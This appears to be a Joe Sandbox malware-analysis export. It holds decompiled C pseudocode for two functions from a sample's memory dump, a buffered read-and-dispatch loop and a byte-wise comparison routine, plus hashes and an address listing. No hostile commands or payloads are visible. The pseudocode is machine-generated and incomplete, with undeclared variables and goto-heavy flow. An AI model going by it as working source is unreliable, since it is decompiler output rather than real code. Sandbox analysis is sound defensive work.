Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 9a159c9802efa681f1d10627476640a02959c4052d829a42743674378c919a55
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 4AC154366052B30AEFAE463D857413FBEE16A916B131A079DE4F3CB1D9FE10D164DA10

Uniqueness

Uniqueness Score: -1.00%

Function 01016646, Relevance: .3, Instructions: 325
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E01016646(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebp;
				signed int _t161;
				intOrPtr _t164;
				signed int _t170;
				signed int _t171;
				signed int _t175;
				signed int _t178;
				void* _t181;
				void* _t188;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t208;
				signed int _t212;
				intOrPtr _t213;
				signed int _t216;
				signed int _t219;
				signed int _t223;
				signed int _t225;
				signed int _t226;
				intOrPtr* _t232;
				void* _t238;
				signed int _t240;
				signed int _t241;
				intOrPtr _t245;
				intOrPtr _t247;
				signed int _t257;
				intOrPtr* _t259;
				signed int _t260;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr _t268;
				void* _t269;
				signed int _t270;
				void* _t272;
				signed int _t273;
				void* _t274;
				void* _t276;

				_t216 = __ecx;
				E01012E6D(__ecx, __edx);
				E010146B1(__ecx,  *((intOrPtr*)(_t274 + 0x238)));
				_t240 = 0;
				if( *(_t216 + 0x1c) +  *(_t216 + 0x1c) != 0) {
					_t238 = 0;
					do {
						_t213 =  *((intOrPtr*)(_t216 + 0x18));
						_t238 = _t238 + 0x4ae4;
						_t240 = _t240 + 1;
						 *((char*)(_t213 + _t238 - 0x13)) = 0;
						 *((char*)(_t213 + _t238 - 0x11)) = 0;
					} while (_t240 <  *(_t216 + 0x1c) +  *(_t216 + 0x1c));
				}
				_t219 = 5;
				memcpy( *((intOrPtr*)(_t216 + 0x18)) + 0x18, _t216 + 0x8c, _t219 << 2);
				E0101F4B0( *((intOrPtr*)(_t216 + 0x18)) + 0x30, _t216 + 0xa0, 0x4a9c);
				_t276 = _t274 + 0x18;
				_t263 = 0;
				 *(_t276 + 0x28) = 0;
				_t268 = 0;
				 *((char*)(_t276 + 0x13)) = 0;
				 *((intOrPtr*)(_t276 + 0x18)) = 0;
				 *((char*)(_t276 + 0x12)) = 0;
				while(1) {
					L4:
					_t161 = E0100CA6C( *_t216,  *((intOrPtr*)(_t216 + 0x20)) + _t263, 0x00400000 - _t263 & 0xfffffff0);
					 *(_t276 + 0x2c) = _t161;
					if(_t161 < 0) {
						break;
					}
					_t263 = _t263 + _t161;
					 *(_t276 + 0x20) = _t263;
					if(_t263 != 0) {
						if(_t161 <= 0) {
							goto L56;
						} else {
							if(_t263 >= 0x400) {
								L56:
								while(_t268 < _t263) {
									_t225 = 0;
									 *(_t276 + 0x14) =  *(_t276 + 0x14) & 0;
									 *(_t276 + 0x1c) = 0;
									_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
									__eflags = _t170;
									if(_t170 != 0) {
										_t245 =  *((intOrPtr*)(_t276 + 0x18));
										_t273 = 0;
										__eflags = 0;
										do {
											_t259 =  *((intOrPtr*)(_t216 + 0x18)) + _t273;
											 *(_t276 + 0x28) = _t225;
											__eflags =  *((char*)(_t259 + 0x4ad3));
											 *_t259 = _t216;
											if( *((char*)(_t259 + 0x4ad3)) == 0) {
												E0100A7BD(_t259 + 4,  *((intOrPtr*)(_t216 + 0x20)) + _t245);
												_t263 =  *(_t276 + 0x20);
												 *((intOrPtr*)(_t259 + 8)) = 0;
												_t170 = _t263 -  *((intOrPtr*)(_t276 + 0x18));
												__eflags = _t170;
												 *((intOrPtr*)(_t259 + 4)) = 0;
												 *(_t259 + 0x4acc) = _t170;
												if(_t170 != 0) {
													 *((char*)(_t259 + 0x4ad0)) = 0;
													 *((char*)(_t259 + 0x14)) = 0;
													 *((char*)(_t259 + 0x2c)) = 0;
													_t225 =  *(_t276 + 0x1c);
													goto L15;
												}
											} else {
												 *(_t259 + 0x4acc) = _t263;
												L15:
												__eflags =  *(_t276 + 0x2c);
												 *((char*)(_t259 + 0x4ad3)) = 0;
												 *(_t259 + 0x4ae0) = _t225;
												__eflags =  *((char*)(_t259 + 0x14));
												 *((char*)(_t259 + 0x4ad2)) = _t170 & 0xffffff00 |  *(_t276 + 0x2c) == 0x00000000;
												if( *((char*)(_t259 + 0x14)) != 0) {
													L20:
													__eflags =  *((char*)(_t276 + 0x13));
													if( *((char*)(_t276 + 0x13)) != 0) {
														L23:
														 *((char*)(_t259 + 0x4ad1)) = 1;
														 *((char*)(_t276 + 0x13)) = 1;
													} else {
														__eflags =  *((intOrPtr*)(_t259 + 0x18)) - 0x20000;
														if( *((intOrPtr*)(_t259 + 0x18)) > 0x20000) {
															goto L23;
														} else {
															 *(_t276 + 0x14) =  *(_t276 + 0x14) + 1;
														}
													}
													_t273 = _t273 + 0x4ae4;
													_t245 =  *((intOrPtr*)(_t276 + 0x18)) +  *((intOrPtr*)(_t259 + 0x24)) +  *((intOrPtr*)(_t259 + 0x18));
													_t225 = _t225 + 1;
													 *((intOrPtr*)(_t276 + 0x18)) = _t245;
													_t208 = _t263 - _t245;
													__eflags = _t208;
													 *(_t276 + 0x1c) = _t225;
													if(_t208 < 0) {
														L26:
														__eflags = _t208 - 0x400;
														if(_t208 >= 0x400) {
															goto L27;
														}
													} else {
														__eflags =  *((char*)(_t259 + 0x28));
														if( *((char*)(_t259 + 0x28)) == 0) {
															goto L26;
														}
													}
												} else {
													 *((char*)(_t259 + 0x14)) = 1;
													_push(_t259 + 0x18);
													_push(_t259 + 4);
													_t212 = E010137C1(_t216);
													__eflags = _t212;
													if(_t212 == 0) {
														L29:
														 *((char*)(_t276 + 0x12)) = 1;
													} else {
														__eflags =  *((char*)(_t259 + 0x29));
														if( *((char*)(_t259 + 0x29)) != 0) {
															L19:
															_t225 =  *(_t276 + 0x1c);
															 *((char*)(_t216 + 0xe662)) = 1;
															goto L20;
														} else {
															__eflags =  *((char*)(_t216 + 0xe662));
															if( *((char*)(_t216 + 0xe662)) == 0) {
																goto L29;
															} else {
																goto L19;
															}
														}
													}
												}
											}
											goto L30;
											L27:
											_t170 =  *(_t216 + 0x1c) +  *(_t216 + 0x1c);
											__eflags = _t225 - _t170;
										} while (_t225 < _t170);
									}
									L30:
									_t226 =  *(_t276 + 0x14);
									_t171 = _t226;
									_t257 = _t171 /  *(_t216 + 0x1c);
									__eflags = _t171 %  *(_t216 + 0x1c);
									if(_t171 %  *(_t216 + 0x1c) != 0) {
										_t257 = _t257 + 1;
										__eflags = _t257;
									}
									_t269 = 0;
									__eflags = _t226;
									if(_t226 != 0) {
										_t247 = 0;
										_t267 = _t276 + 0x34;
										_t195 = _t257 * 0x4ae4;
										__eflags = _t195;
										 *((intOrPtr*)(_t276 + 0x24)) = 0;
										 *(_t276 + 0x30) = _t195;
										do {
											_t232 = _t267;
											_t248 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											_t197 =  *(_t276 + 0x14) - _t269;
											_t267 = _t267 + 8;
											 *_t232 = _t247 +  *((intOrPtr*)(_t216 + 0x18));
											__eflags = _t257 - _t197;
											if(_t257 < _t197) {
												_t197 = _t257;
											}
											__eflags =  *(_t276 + 0x1c) - 1;
											 *(_t232 + 4) = _t197;
											if( *(_t276 + 0x1c) != 1) {
												E010107F1( *((intOrPtr*)(_t216 + 0x14)), E01017090, _t232);
											} else {
												E01016A7B(_t216, _t248);
											}
											_t269 = _t269 + _t257;
											_t247 =  *((intOrPtr*)(_t276 + 0x24)) +  *(_t276 + 0x30);
											 *((intOrPtr*)(_t276 + 0x24)) = _t247;
											__eflags = _t269 -  *(_t276 + 0x14);
										} while (_t269 <  *(_t276 + 0x14));
										_t263 =  *(_t276 + 0x20);
									}
									_t270 =  *(_t276 + 0x1c);
									__eflags = _t270;
									if(_t270 == 0) {
										_t268 =  *((intOrPtr*)(_t276 + 0x18));
										goto L68;
									} else {
										E01010A41( *((intOrPtr*)(_t216 + 0x14)));
										 *(_t276 + 0x14) = 0;
										__eflags = _t270;
										if(_t270 == 0) {
											L52:
											_t175 =  *((intOrPtr*)(_t276 + 0x12));
											goto L53;
										} else {
											_t260 = 0;
											__eflags = 0;
											do {
												_t272 =  *((intOrPtr*)(_t216 + 0x18)) + _t260;
												__eflags =  *((char*)(_t272 + 0x4ad1));
												if( *((char*)(_t272 + 0x4ad1)) != 0) {
													L47:
													_t178 = E010170BF(_t216, _t272);
													__eflags = _t178;
													if(_t178 != 0) {
														goto L48;
													}
												} else {
													_t194 = E0101321A(_t216, _t272);
													__eflags = _t194;
													if(_t194 != 0) {
														__eflags =  *((char*)(_t272 + 0x4ad1));
														if( *((char*)(_t272 + 0x4ad1)) == 0) {
															L48:
															__eflags =  *((char*)(_t272 + 0x4ad0));
															if( *((char*)(_t272 + 0x4ad0)) == 0) {
																__eflags =  *((char*)(_t272 + 0x4ad3));
																if( *((char*)(_t272 + 0x4ad3)) != 0) {
																	_t230 =  *((intOrPtr*)(_t216 + 0x20));
																	_t181 =  *((intOrPtr*)(_t272 + 0x10)) -  *((intOrPtr*)(_t216 + 0x20)) +  *(_t272 + 4);
																	__eflags = _t263 - _t181;
																	if(_t263 > _t181) {
																		_t263 = _t263 - _t181;
																		 *(_t276 + 0x2c) = _t263;
																		E01021870(_t230, _t181 + _t230, _t263);
																		_t276 = _t276 + 0xc;
																		 *((intOrPtr*)(_t272 + 0x18)) =  *((intOrPtr*)(_t272 + 0x18)) +  *(_t272 + 0x20) -  *(_t272 + 4);
																		 *(_t272 + 0x24) =  *(_t272 + 0x24) & 0x00000000;
																		 *(_t272 + 0x20) =  *(_t272 + 0x20) & 0x00000000;
																		 *(_t272 + 4) =  *(_t272 + 4) & 0x00000000;
																		 *((intOrPtr*)(_t272 + 0x10)) =  *((intOrPtr*)(_t216 + 0x20));
																		__eflags =  *(_t276 + 0x14);
																		if( *(_t276 + 0x14) != 0) {
																			_t188 =  *((intOrPtr*)(_t216 + 0x18));
																			E0101F4B0(_t188, _t272, 0x4ae4);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4ad4)) =  *((intOrPtr*)(_t188 + 0x4ad4));
																			_t263 =  *(_t276 + 0x2c);
																			 *((intOrPtr*)( *((intOrPtr*)(_t216 + 0x18)) + 0x4adc)) =  *((intOrPtr*)(_t188 + 0x4adc));
																			 *((char*)(_t272 + 0x4ad3)) = 0;
																			goto L62;
																		}
																		goto L63;
																	}
																} else {
																	__eflags =  *((char*)(_t272 + 0x28));
																	if( *((char*)(_t272 + 0x28)) != 0) {
																		_t175 = 1;
																		 *((char*)(_t276 + 0x12)) = 1;
																		L53:
																		__eflags = _t175;
																		if(_t175 == 0) {
																			_t268 =  *((intOrPtr*)(_t276 + 0x18));
																			_t263 = _t263 - _t268;
																			__eflags = _t263 - 0x400;
																			if(_t263 < 0x400) {
																				__eflags = _t263;
																				if(__eflags >= 0) {
																					if(__eflags <= 0) {
																						L63:
																						_t268 = 0;
																						 *((intOrPtr*)(_t276 + 0x18)) = 0;
																						L68:
																						__eflags =  *((char*)(_t276 + 0x12));
																						if( *((char*)(_t276 + 0x12)) == 0) {
																							goto L4;
																						}
																					} else {
																						E01021870( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)) + _t268, _t263);
																						L62:
																						_t276 = _t276 + 0xc;
																						goto L63;
																					}
																				}
																			} else {
																				_t263 =  *(_t276 + 0x20);
																				goto L56;
																			}
																		}
																	} else {
																		goto L51;
																	}
																}
															}
														} else {
															goto L47;
														}
													}
												}
												goto L69;
												L51:
												_t260 = _t260 + 0x4ae4;
												_t193 =  *(_t276 + 0x14) + 1;
												 *(_t276 + 0x14) = _t193;
												__eflags = _t193 -  *(_t276 + 0x1c);
											} while (_t193 <  *(_t276 + 0x1c));
											goto L52;
										}
									}
									goto L69;
								}
							}
							continue;
						}
					}
					break;
				}
				L69:
				 *(_t216 + 0x7c) =  *(_t216 + 0x7c) &  *(_t216 + 0xe6dc);
				E01014BB3(_t216);
				_t241 =  *(_t276 + 0x28) * 0x4ae4;
				_t164 =  *((intOrPtr*)(_t216 + 0x18));
				_t223 = 5;
				__eflags = _t164 + _t241 + 0x30;
				return E0101F4B0(memcpy(_t216 + 0x8c, _t241 + 0x18 + _t164, _t223 << 2), _t164 + _t241 + 0x30, 0x4a9c);
			}

0x01016650
0x01016652
0x01016660
0x01016668
0x0101666c
0x0101666e
0x01016670
0x01016670
0x01016673
0x01016679
0x0101667a
0x0101667f
0x01016689
0x01016670
0x01016698
0x010166a8
0x010166b1
0x010166b8
0x010166bb
0x010166bd
0x010166c1
0x010166c3
0x010166c7
0x010166cb
0x010166cf
0x010166cf
0x010166e2
0x010166e7
0x010166ed
0x00000000
0x00000000
0x010166f3
0x010166f5
0x010166f9
0x01016701
0x00000000
0x01016707
0x0101670d
0x00000000
0x01016963
0x01016717
0x01016719
0x0101671d
0x01016721
0x01016721
0x01016723
0x01016729
0x0101672d
0x0101672d
0x0101672f
0x01016732
0x01016734
0x01016738
0x0101673f
0x01016741
0x01016754
0x01016759
0x01016761
0x01016764
0x01016764
0x01016768
0x0101676b
0x01016771
0x01016777
0x0101677d
0x01016780
0x01016783
0x00000000
0x01016783
0x01016743
0x01016743
0x01016787
0x01016787
0x0101678c
0x01016796
0x0101679c
0x010167a0
0x010167a6
0x010167d9
0x010167d9
0x010167de
0x010167ef
0x010167ef
0x010167f6
0x010167e0
0x010167e0
0x010167e7
0x00000000
0x010167e9
0x010167e9
0x010167e9
0x010167e7
0x010167fe
0x0101680b
0x0101680d
0x01016810
0x01016814
0x01016814
0x01016816
0x0101681a
0x01016822
0x01016822
0x01016827
0x00000000
0x00000000
0x0101681c
0x0101681c
0x01016820
0x00000000
0x00000000
0x01016820
0x010167a8
0x010167ab
0x010167af
0x010167b5
0x010167b6
0x010167bb
0x010167bd
0x01016838
0x01016838
0x010167bf
0x010167bf
0x010167c3
0x010167ce
0x010167ce
0x010167d2
0x00000000
0x010167c5
0x010167c5
0x010167cc
0x00000000
0x00000000
0x00000000
0x00000000
0x010167cc
0x010167c3
0x010167bd
0x010167a6
0x00000000
0x01016829
0x0101682c
0x0101682e
0x0101682e
0x01016836
0x0101683d
0x0101683d
0x01016843
0x01016848
0x0101684a
0x0101684c
0x0101684e
0x0101684e
0x0101684e
0x0101684f
0x01016851
0x01016853
0x01016855
0x01016857
0x0101685b
0x0101685b
0x01016861
0x01016865
0x01016869
0x0101686d
0x0101686f
0x01016872
0x01016874
0x01016877
0x01016879
0x0101687b
0x0101687d
0x0101687d
0x0101687f
0x01016884
0x01016887
0x0101689c
0x01016889
0x0101688c
0x0101688c
0x010168a5
0x010168a7
0x010168ab
0x010168af
0x010168af
0x010168b5
0x010168b5
0x010168b9
0x010168bd
0x010168bf
0x01016a1a
0x00000000
0x010168c5
0x010168c8
0x010168cf
0x010168d3
0x010168d5
0x01016941
0x01016941
0x00000000
0x010168d7
0x010168d7
0x010168d7
0x010168d9
0x010168dc
0x010168de
0x010168e5
0x01016900
0x01016903
0x01016908
0x0101690a
0x00000000
0x00000000
0x010168e7
0x010168ea
0x010168ef
0x010168f1
0x010168f7
0x010168fe
0x01016910
0x01016910
0x01016917
0x0101691d
0x01016924
0x0101697b
0x01016980
0x01016983
0x01016985
0x0101698b
0x01016992
0x01016996
0x0101699e
0x010169a4
0x010169a7
0x010169ab
0x010169b2
0x010169b6
0x010169bd
0x010169bf
0x010169c1
0x010169d7
0x010169df
0x010169e8
0x010169ec
0x010169f2
0x00000000
0x010169f2
0x00000000
0x010169bf
0x01016926
0x01016926
0x0101692a
0x01016970
0x01016972
0x01016945
0x01016945
0x01016947
0x0101694d
0x01016951
0x01016953
0x01016959
0x01016a04
0x01016a06
0x01016a08
0x010169fc
0x010169fc
0x010169fe
0x01016a1e
0x01016a1e
0x01016a23
0x00000000
0x00000000
0x01016a0a
0x01016a13
0x010169f9
0x010169f9
0x00000000
0x010169f9
0x01016a08
0x0101695f
0x0101695f
0x00000000
0x0101695f
0x01016959
0x00000000
0x00000000
0x00000000
0x0101692a
0x01016924
0x00000000
0x00000000
0x00000000
0x010168fe
0x010168f1
0x00000000
0x0101692c
0x01016930
0x01016936
0x01016937
0x0101693b
0x0101693b
0x00000000
0x010168d9
0x010168d5
0x00000000
0x010168bf
0x0101696b
0x00000000
0x0101670d
0x01016701
0x00000000
0x010166f9
0x01016a29
0x01016a31
0x01016a34
0x01016a39
0x01016a47
0x01016a4c
0x01016a5a
0x01016a78

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d99c268e1c4e71f8fb4dc462a384ed07c3ac337b3c323d9ce4547e1b9a3329aa
Instruction ID: b7b09c5ef59b1bc5a417a8de79f838681e3f7b564858a6084ee3e975904f20d6
Opcode Fuzzy Hash: d99c268e1c4e71f8fb4dc462a384ed07c3ac337b3c323d9ce4547e1b9a3329aa
Instruction Fuzzy Hash: C7D106B1A043428FDB14CF29CC8079ABBE4BF55304F0445ADEDC49B24AD7B9E958CB96

Uniqueness

Uniqueness Score: -1.00%

Function 010202F6, Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E010202F6(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x010202f6
0x010202f6
0x010202f6
0x010202fc
0x01020383
0x01020385
0x01020387
0x01020706
0x01020706
0x010214f7
0x010214f7
0x0102038d
0x01020393
0x0102041a
0x0102041c
0x0102041e
0x00000000
0x00000000
0x01020424
0x0102042a
0x010204b1
0x010204b3
0x010204b5
0x00000000
0x00000000
0x010204bb
0x010204c1
0x01020548
0x0102054a
0x0102054c
0x00000000
0x00000000
0x01020558
0x010205e0
0x010205e2
0x010205e4
0x00000000
0x00000000
0x010205ea
0x010205f0
0x01020677
0x01020679
0x0102067b
0x00000000
0x00000000
0x01020681
0x01020687
0x010206fe
0x01020700
0x01020702
0x01020704
0x01020704
0x00000000
0x01020702
0x01020690
0x01020692
0x010206a6
0x010206ae
0x010206b0
0x010206c4
0x010206cc
0x010206ce
0x010206e2
0x010206ea
0x010206ec
0x010206f5
0x010206f5
0x00000000
0x010206ec
0x010206d7
0x010206e0
0x00000000
0x00000000
0x00000000
0x010206e0
0x010206b9
0x010206c2
0x00000000
0x00000000
0x00000000
0x010206c2
0x0102069b
0x010206a4
0x00000000
0x00000000
0x00000000
0x010206a4
0x010205fd
0x010205ff
0x01020617
0x0102061f
0x01020621
0x01020639
0x01020641
0x01020643
0x0102065b
0x01020663
0x01020665
0x0102066e
0x0102066e
0x00000000
0x01020665
0x0102064c
0x01020655
0x00000000
0x00000000
0x00000000
0x01020655
0x0102062a
0x01020633
0x00000000
0x00000000
0x00000000
0x01020633
0x01020608
0x01020611
0x00000000
0x00000000
0x00000000
0x01020611
0x01020566
0x01020568
0x01020580
0x01020588
0x0102058a
0x010205a2
0x010205aa
0x010205ac
0x010205c4
0x010205cc
0x010205ce
0x010205d7
0x010205d7
0x00000000
0x010205ce
0x010205b5
0x010205be
0x00000000
0x00000000
0x00000000
